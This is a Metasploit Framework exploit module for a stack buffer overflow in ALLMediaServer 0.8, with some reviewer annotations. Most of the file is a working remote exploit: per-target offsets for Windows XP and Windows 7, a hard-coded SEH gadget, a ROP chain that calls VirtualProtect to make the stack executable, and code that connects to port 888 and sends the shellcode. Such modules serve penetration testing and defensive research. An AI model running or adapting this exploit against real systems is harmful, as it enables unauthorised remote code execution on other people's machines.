##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
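class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Stack buffer overflow in ALLMediaServer 0.8 (default TCP port 888).
  #
  # Layout of the request that is sent (see #exploit):
  #   [junk up to OffsetRop][ROP chain][jmp +jmp][pad up to Offset][SEH record][payload]
  # The SEH handler ('Ret') is an ADD ESP,6CC # POP # POP # POP # RET
  # gadget; OffsetRop/jmp are per target and are presumably chosen so the
  # ESP adjustment lands on the ROP chain, which in turn jumps forward to
  # the shellcode that follows the SEH record.
  #
  # NOTE(review): every gadget address below is hard-coded for the
  # non-ASLR DLLs bundled with this exact ALLMediaServer build; a different
  # build of the application (not only of Windows) will shift them.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLMediaServer 0.8 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.8.
        The vulnerability is caused due to a boundary error within the
        handling of HTTP request.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'motaz reda <motazkhodair[at]gmail.com>', # Original discovery
          'modpr0be <tom[at]spentera.com>',         # Metasploit module
          'juan vazquez'                            # More improvement
        ],
      'References'     =>
        [
          [ 'EDB', '19625' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "",
          'Space'       => 660,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          # Both targets share the SEH handler gadget; only the stack
          # layout (OffsetRop / jmp) differs between OS versions.
          [ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
            {
              'Ret'       => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll (sic; presumably avcodec-53.dll)
              'OffsetRop' => 696,        # offset of the ROP chain in the request
              'jmp'       => 264,        # relative jump from the chain to the payload
              'Offset'    => 1072        # offset of the SEH record
            }
          ],
          [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
            {
              'Ret'       => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll (sic; presumably avcodec-53.dll)
              'OffsetRop' => 332,
              'jmp'       => 628,
              'Offset'    => 1072
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 04 2012',
      'DefaultTarget'  => 1))

    register_options([Opt::RPORT(888)], self.class)
  end

  # Returns n random 32-bit values, used as filler for gadgets that POP
  # registers whose contents do not matter.
  def junk(n = 1)
    [rand_text_alpha(4).unpack("L")[0]] * n
  end

  # Returns n NOP-equivalents: a RETN gadget address when building the
  # ROP chain (rop = true), otherwise plain 0x90 bytes packed as a dword.
  def nops(rop = false, n = 1)
    value = rop ? 0x665a0aa1 : 0x90909090
    [value] * n
  end

  # Assembles a snippet of x86 assembly into raw bytes.
  def asm(code)
    Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
  end

  def exploit
    # ROP chain generated with help from mona: loads VirtualProtect()
    # through its import pointer, sets up the arguments in registers and
    # ends in PUSHAD # RETN to make the call.
    rop = [
      nops(true, 12),  # ROP NOP sled
      0x65f6faa7,      # POP EAX # RETN
      0x671ee4e0,      # ptr to &VirtualProtect()
      0x6ac1ccb4,      # MOV EAX,DWORD PTR DS:[EAX] # RETN
      0x667ceedf,      # PUSH EAX # POP ESI # POP EDI # RETN
      junk,            # consumed by the extra POP EDI
      0x65f5f09d,      # POP EBP # RETN
      0x65f9830d,      # & call esp
      0x6ac1c1d5,      # POP EBX # RETN
      0x00000600,      # 0x600 -> ebx (size argument; the original comment said 0x320 but the value sent is 0x600)
      0x6672a1e2,      # POP EDX # RETN
      0x00000040,      # 0x40 -> edx (PAGE_EXECUTE_READWRITE)
      0x665a09df,      # POP ECX # RETN
      0x6ad58a3d,      # &Writable location
      0x6ac7a771,      # POP EDI # RETN
      nops(true),      # RETN (ROP NOP)
      0x6682f9f4,      # POP EAX # RETN
      nops,            # nop
      0x663dcbd2       # PUSHAD # RETN
    ].flatten.pack("V*")

    # Build the whole request before touching the network so a failure
    # while assembling it cannot leave a connection half open.
    buffer = rand_text(target['OffsetRop'])               # junk up to the ROP chain
    buffer << rop
    buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}")   # jmp to payload

    # A target whose 'Offset' is smaller than what precedes the SEH record
    # would otherwise be padded with an empty string (negative length) and
    # send a silently misaligned request; refuse instead.
    if buffer.length > target['Offset']
      fail_with(Exploit::Failure::BadConfig,
        "ROP chain (#{buffer.length} bytes) overruns the SEH offset (#{target['Offset']}) for #{target.name}")
    end

    buffer << rand_text(target['Offset'] - buffer.length) # pad up to the SEH record
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    connect
    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)
    disconnect
  end
end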